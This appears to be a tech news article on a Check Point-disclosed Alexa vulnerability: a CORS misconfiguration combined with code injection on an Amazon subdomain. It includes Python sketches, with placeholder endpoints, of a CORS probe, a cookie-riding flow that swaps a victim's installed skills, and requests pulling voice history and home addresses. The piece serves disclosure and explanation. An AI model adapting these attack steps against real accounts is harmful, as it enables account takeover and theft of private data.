Check Point researchers uncovered Alexa flaw that exposed personal information and speech histories

Researchers at Check Point say they identified an exploit in Amazon’s Alexa voice platform that could have given attackers access to users’ personal information, speech histories, and Amazon accounts. In a blog post, they describe how an attack might have been carried out against a user, beginning with a malicious link pointing to a page vulnerable to code injection.

Maintaining privacy with voice assistants is a challenging task, given that state-of-the-art AI techniques have been used to infer attributes like intention, gender, emotional state, and identity from timbre, pitch, and speaking style. Recent reporting revealed that accidental voice assistant activations exposed private conversations, and a study by Clemson University School of Computing researchers found that Amazon Alexa and Google Assistant voice app privacy policies are often “problematic” and violate baseline requirements. The risk is such that law firms including Mishcon de Reya have advised staff to mute smart speakers when they talk about client matters at home.

The Check Point researchers say they identified the vulnerability by conducting tests with Alexa’s smartphone companion app. Using a script to bypass a mechanism that prevented them from inspecting the app’s network traffic, they found that several requests the app made were governed by a misconfigured cross-origin resource sharing (CORS) policy that allowed requests to be sent from any Amazon subdomain. This, they assert, could have allowed attackers with code-injection capabilities on one Amazon subdomain to perform a cross-domain attack on another.
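
To make the misconfiguration concrete, below is a minimal Python sketch of the kind of cross-origin probe this finding implies: send a request with an Origin header naming an Amazon subdomain and check whether the server reflects that origin back with credentials allowed. The endpoint URL is a hypothetical placeholder, not one Check Point named.

```python
# Minimal CORS probe: does the server accept credentialed cross-origin
# requests from arbitrary Amazon subdomains? The endpoint below is a
# hypothetical placeholder, not an endpoint named in the research.
import requests

PROBE_URL = "https://skillsstore.amazon.com/api/example"  # placeholder

def cors_allows(origin: str) -> bool:
    """Return True if the server reflects `origin` in its CORS headers."""
    resp = requests.get(PROBE_URL, headers={"Origin": origin}, timeout=10)
    allowed = resp.headers.get("Access-Control-Allow-Origin", "")
    with_credentials = resp.headers.get("Access-Control-Allow-Credentials") == "true"
    return allowed == origin and with_credentials

# A policy that validates only the ".amazon.com" suffix answers True for
# every subdomain, including one an attacker can inject code into.
for origin in ("https://track.amazon.com", "https://any-other.amazon.com"):
    print(origin, "->", cors_allows(origin))
```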

In a proof of concept, the researchers exploited a code-injection flaw in one of Amazon’s subdomains, leveraging victims’ cookies and the misconfigured policy to modify Alexa accounts. They created links that directed dummy victims to track.amazon.com, from which they could send requests carrying the victims’ cookies to a URL that returned the list of voice apps installed on each victim’s Alexa account. The researchers then used a CSRF token to remove a common app from the list and install a malicious app with the same invocation phrase as the deleted app. That way, the next time victims used the invocation phrase, they unwittingly triggered the attacker’s app.
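
That request sequence can be sketched roughly as follows. In the real attack the logic would run as JavaScript injected into the vulnerable page, with the victim’s browser attaching the Amazon cookies automatically; Python is used here only for readability, and every endpoint path, field, and identifier is a hypothetical placeholder rather than the actual skill store API.

```python
# Sketch of the proof-of-concept flow: list skills, remove one, install a
# look-alike. All URLs, fields, and identifiers are hypothetical placeholders.
import requests

victim_cookies = {"session-id": "..."}   # obtained via the code-injection flaw
ATTACKER_SKILL_ID = "attacker-skill-id"  # a skill the attacker has published

session = requests.Session()
session.cookies.update(victim_cookies)

# 1. Fetch the victim's installed skills plus the anti-CSRF token the store
#    expects on state-changing requests.
data = session.get("https://skillsstore.amazon.com/your-skills").json()
skills, csrf_token = data["skills"], data["csrfToken"]

# 2. Silently remove a commonly installed skill (assumes it is present)...
target = next(s for s in skills if s["invocationPhrase"] == "open example bank")
session.post(
    "https://skillsstore.amazon.com/uninstall",
    json={"skillId": target["id"]},
    headers={"csrf-token": csrf_token},
)

# 3. ...and install the attacker's skill under the same invocation phrase, so
#    the victim's next use of that phrase triggers the malicious skill.
session.post(
    "https://skillsstore.amazon.com/install",
    json={"skillId": ATTACKER_SKILL_ID},
    headers={"csrf-token": csrf_token},
)
```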

From there, the researchers performed actions on behalf of victims, triggering a server-side error that allowed them to execute custom code. Taking full control of the victims’ accounts, they were able to do the following (a code sketch of items 3 and 4 appears after the list):

  1. Get a list of installed voice apps, which could later be used to replace one of the victims’ apps with a published app of the attacker’s choosing from the Alexa Skills Store.
  2. Silently remove an installed app from the victims’ accounts.
  3. Get the victims’ voice history with Alexa, including each command and Alexa’s response to it. (The researchers note this could have exposed personal data like banking history, usernames, and phone numbers, depending on the voice apps installed.)
  4. Look up personal information stored in users’ profiles, such as home addresses.
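
As a rough illustration of items 3 and 4, once an attacker holds a session riding on the victim’s cookies, those reads reduce to ordinary authenticated requests. The paths and response fields below are hypothetical placeholders, not documented Alexa endpoints.

```python
# Sketch of the data-exfiltration reads; URLs and fields are placeholders.
import requests

session = requests.Session()
session.cookies.update({"session-id": "..."})  # the victim's Amazon cookies

# Item 3: the victim's voice history, one utterance and response per record.
history = session.get("https://www.amazon.com/alexa-voice-history").json()
for record in history.get("records", []):
    print(record.get("utterance"), "->", record.get("response"))

# Item 4: profile details such as the home address stored on the account.
profile = session.get("https://www.amazon.com/alexa-profile").json()
print("Address on file:", profile.get("address"))
```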

The researchers say their work exposes a weak point in the bridges to internet of things appliances, such as smart speakers. Both the bridge and the devices it connects serve as entry points, they say, and both must be secured at all times to keep hackers from infiltrating homes.

“Virtual assistants are used in smart homes to control everyday IoT devices such as lights, A/C, vacuum cleaners, electricity, and entertainment. They grew in popularity in the past decade to play a role in our daily lives, and it seems as technology evolves, they will become more pervasive,” the researchers wrote. “As virtual assistants today serve as entry points to people’s home appliances and device controllers, securing these points has become critical, with maintaining the user’s privacy being top priority.”
